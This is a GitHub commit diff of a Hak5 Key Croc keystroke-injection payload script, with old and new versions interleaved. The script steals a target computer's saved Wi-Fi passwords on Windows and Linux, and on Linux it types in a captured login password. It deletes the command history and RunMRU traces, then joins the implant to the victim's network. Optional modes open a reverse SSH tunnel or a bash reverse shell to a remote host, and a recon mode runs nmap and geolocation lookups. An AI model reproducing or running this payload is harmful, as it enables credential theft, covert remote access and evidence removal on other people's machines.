Update Croc_getonline.txt

minor changes
new options recon, ssh
keycroc MATCH command perform specific tasks
pull/62/head
spywill 2023-07-19 06:02:58 -04:00 committed by GitHub
parent 691ec577f4
commit ec819336d7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 329 additions and 83 deletions

View File

@ -1,118 +1,364 @@
# Title: Croc_Getonline # Title: Croc_Getonline
# Description: Attempt to connect Keycroc automatically to target wifi access point # Description: Attempt to connect Keycroc automatically to target wifi access point
# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt # Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
# Author: spywill # Author: spywill
# Version: 3.5 # Version: 4.1
# Category: Key Croc # Category: Key Croc
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
MATCH (getonline_W|getonline_R|getonline_L) # getonline_W <-- MATCH word for windows, Attempt connection to access point
# getonline_L <-- MATCH word for Linux, Attempt connection to access point
# getonline_R <-- MATCH word for Raspberry pi, Attempt connection to access point
# getonline_N <-- MATCH word for connecting to known SSID ( EDIT PAYLOAD )
# getonline_F <-- MATCH word for reset wlan0 interface to last known SSID
# getonline_K <-- MATCH word for killing keycroc wlan0 interface
# getonline_S <-- MATCH word for entering ATTACKMODE HID STORAGE
# getonline_H <-- MATCH word for entering ATTACKMODE HID
# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot) MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X)
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done QUACK LOCK
wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt #---> Edit payload option below
option=0
keycroc_password=hak5croc
wifi_pass=/tools/wifipass.txt
if [ -f $wifi_pass ]; then #---> Edit remote host below
cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt remote_user_name=EDIT_REMOTE_USERNAME_HERE
rm -f $wifi_pass remote_host_ip=EDIT_REMOTE_HOST_IP_HERE
remote_host_password=EDIT_REMOTE_HOST_PASSWORD_HERE
port=7000
#---> Edit known SSID and password below
known_ssid=EDIT_KNOWN_SSID_HERE
known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
#---> Edit recon scan on/off below
recon=off
recon_loot=/root/udisk/tools/Target_SSID.txt
#---> Edit Linux target password below
if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
else
target_password=ENTER_LINUX_PASSWORD_HERE
fi fi
ATTACKMODE HID STORAGE recon_scan() {
Q DELAY 5000 if [ "$recon" = "on" ]; then
LED ATTACK if [ "$LOOT" = "getonline_W" ]; then
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
QUACK ENTER
QUACK DELAY 2000
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
QUACK ENTER
QUACK DELAY 2000
else
:
fi
elif [ "$recon" = "off" ]; then
:
else
:
fi
}
ENTER_STORAGE() {
if [ -f ~/udisk$wifi_pass ]; then
cat ~/udisk$wifi_pass >> ~/udisk/tools/old_wifipass.txt
rm -f ~/udisk$wifi_pass
fi
ATTACKMODE HID STORAGE
QUACK DELAY 5000
LED ATTACK
}
RESET_PAYLOAD() {
QUACK UNLOCK
sleep 5 ; LED OFF
killall -9 bash
killall -9 python
sleep 1
RELOAD_PAYLOADS
}
CLEAN_UP() {
if [ "$LOOT" = "getonline_W" ]; then
QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\""
QUACK ENTER
QUACK DELAY 2000
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
QUACK STRING "history -c ; rm -f ~/.bash_history"
QUACK ENTER
QUACK DELAY 2000
else
:
fi
}
case $LOOT in case $LOOT in
getonline_W) getonline_W)
Q GUI r ENTER_STORAGE
Q DELAY 3000 QUACK GUI r
Q STRING "powershell -NoP -NonI -W Hidden" QUACK DELAY 3000
Q ENTER QUACK STRING "powershell -NoP -NonI -W Hidden"
Q DELAY 5000 QUACK ENTER
Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" QUACK DELAY 5000
Q ENTER QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
Q DELAY 3000 QUACK ENTER
Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" QUACK DELAY 3000
Q ENTER QUACK STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
Q DELAY 2000 QUACK ENTER
Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" QUACK DELAY 2000
Q ENTER QUACK STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
Q DELAY 2000 QUACK ENTER
Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\"" QUACK DELAY 2000
Q ENTER QUACK STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT$wifi_pass\""
Q DELAY 5000 QUACK ENTER
Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit" QUACK DELAY 5000
Q ENTER recon_scan
CLEAN_UP
QUACK STRING "exit"
QUACK ENTER
ATTACKMODE HID
;; ;;
getonline_R) getonline_R)
Q CONTROL-ALT-d ENTER_STORAGE
Q CONTROL-ALT-t QUACK CONTROL-ALT-d
Q DELAY 2000 QUACK CONTROL-ALT-t
Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" QUACK DELAY 2000
Q ENTER QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
Q DELAY 2000 QUACK ENTER
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" QUACK DELAY 2000
Q ENTER QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
Q DELAY 2000 QUACK ENTER
Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" QUACK DELAY 2000
Q ENTER QUACK STRING "SSID_password=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
Q DELAY 2000 QUACK ENTER
Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" QUACK DELAY 2000
Q ENTER QUACK STRING "echo \"\$currentSSID \$SSID_password\" | tee \$MOUNT_POINT$wifi_pass"
Q DELAY 3000 QUACK ENTER
Q STRING "umount \$MOUNT_POINT ; exit" QUACK DELAY 3000
Q ENTER recon_scan
CLEAN_UP
QUACK STRING "umount \$MOUNT_POINT ; exit"
QUACK ENTER
ATTACKMODE HID
;; ;;
getonline_L) getonline_L)
if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then ENTER_STORAGE
PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) QUACK CONTROL-ALT-d
QUACK ALT-t
QUACK DELAY 2000
QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "$target_password"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "SSID_password=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "echo \"\$currentSSID \$SSID_password\" | sudo tee \$MOUNT_POINT$wifi_pass"
QUACK ENTER
QUACK DELAY 3000
recon_scan
CLEAN_UP
QUACK STRING "sudo umount \$MOUNT_POINT ; exit"
QUACK ENTER
ATTACKMODE HID
;;
getonline_N)
LED B
sleep 2
echo "$known_ssid $known_ssid_password" > ~/udisk$wifi_pass
;;
getonline_F)
if [ -f ~/udisk$wifi_pass ]; then
LED B
sleep 2
else else
PC_PW=LINUX LED R
RESET_PAYLOAD
fi fi
Q CONTROL-ALT-d ;;
Q ALT-t getonline_K)
Q DELAY 2000 ifconfig wlan0 down
Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" LED R
Q ENTER RESET_PAYLOAD
Q DELAY 2000 ;;
Q STRING "$PC_PW" getonline_S)
Q ENTER ATTACKMODE HID STORAGE
Q DELAY 2000 RESET_PAYLOAD
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" ;;
Q ENTER getonline_H)
Q DELAY 2000 ATTACKMODE HID
Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" RESET_PAYLOAD
Q ENTER ;;
Q DELAY 2000 getonline_P)
Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" ATTACKMODE HID SERIAL
Q ENTER RESET_PAYLOAD
Q DELAY 3000 ;;
Q STRING "sudo umount \$MOUNT_POINT ; exit" getonline_A)
Q ENTER ATTACKMODE HID AUTO_ETHERNET
RESET_PAYLOAD
;;
getonline_X)
LED R
rm -f /root/udisk/payloads/Croc_getonline.txt
rm -f /root/udisk/tools/wifipass.txt /root/udisk/tools/old_wifipass.txt
rm -f $recon_loot root/udisk/config.txt
apt -y remove sshpass
reboot --force
;; ;;
esac esac
ATTACKMODE HID
sleep 3 sleep 3
LED SETUP word_count=$(head -n 1 "/root/udisk$wifi_pass" | sed 's/^[[:space:]]*//' | sed 's/[[:space:]]*$//' | wc -w)
kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient) if [[ $word_count -eq 2 ]]; then
ssid_to_match="$(sed 's/ .*//' /root/udisk$wifi_pass)"
matched_ssid="$(iw dev wlan0 scan | grep -Ewi "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')"
sleep 1
if [[ "$ssid_to_match" =~ "$matched_ssid" ]]; then
LED SETUP
else
LED R
RESET_PAYLOAD
fi
else
LED R
RESET_PAYLOAD
fi
kill -9 $(pidof wpa_supplicant)
kill -9 $(pidof dhclient)
ifconfig wlan0 down ifconfig wlan0 down
if [ "$LOOT" = "getonline_W" ]; then if [ "$LOOT" = "getonline_W" ]; then
sed -i '0,/./s/^.//' $wifi_pass sed -i '0,/./s/^.//' ~/udisk$wifi_pass
sed -i 's/\r//g' $wifi_pass sed -i -e '1s/^[^[:print:]]*//' ~/udisk$wifi_pass
sed -i 's/\r//g' ~/udisk$wifi_pass
fi fi
sed -i 's/\( \)*/\1/g' $wifi_pass sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt
sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt
wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf
ifconfig wlan0 up ifconfig wlan0 up
wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0 wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf
dhclient wlan0
sleep 3 sleep 3
systemctl restart ssh.service systemctl restart ssh.service
[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R if : >/dev/tcp/8.8.8.8/53; then
if [ $option -eq 0 ]; then
:
elif [ $option -eq 1 ]; then
case "$LOOT" in
getonline_W)
QUACK GUI m
QUACK GUI r
QUACK DELAY 2000
QUACK STRING "powershell"
QUACK ENTER
QUACK DELAY 5000
;;
getonline_R)
QUACK CONTROL-ALT-d
QUACK CONTROL-ALT-t
QUACK DELAY 2000
;;
getonline_L)
QUACK CONTROL-ALT-d
QUACK ALT-t
QUACK DELAY 2000
;;
esac
QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "$keycroc_password"
QUACK ENTER
elif [ $option -eq 2 ]; then
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
if [ ! $? = 0 ] || [ ! "$status" = installed ]; then
apt -y install sshpass
else
:
fi
sleep 1
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null
rm -rf ~/.ssh 2>/dev/null
ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
sleep 1
ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
else
LED R
sleep 1
fi
elif [ $option -eq 3 ]; then
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
/bin/bash -i >& /dev/tcp/"$remote_host_ip"/"$port" 0>&1 &
else
LED R
sleep 1
fi
else
LED FINISH
fi
LED FINISH
else
LED R
fi
sleep 3 sleep 3
LED OFF LED OFF
QUACK UNLOCK
if [ "$recon" = "on" ]; then
LED C SLOW
echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
ssid_to_match=$(sed 's/ .*//' ~/udisk$wifi_pass)
iw dev wlan0 scan | egrep -Ewi 'BSS|signal:|SSID:|DS Parameter set:|Country:|freq:|Manufacturer:|Model Number:|Serial Number:|Device name:' | grep -A5 -B3 "SSID: $ssid_to_match" >> $recon_loot
echo -ne "\n\nReachable IP on local network:\n\n" >> $recon_loot
ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
cat /etc/resolv.conf | grep nameserver >> $recon_loot
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
calculate_network_range() {
ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
echo "$network_range"
}
perform_nmap_scan() {
local network_range=$1
nmap -T4 -F $network_range >> $recon_loot
}
network_range=$(calculate_network_range)
perform_nmap_scan $network_range
echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
echo -ne "\n\n" >> $recon_loot
LED OFF
elif [ "$recon" = "off" ]; then
:
else
:
fi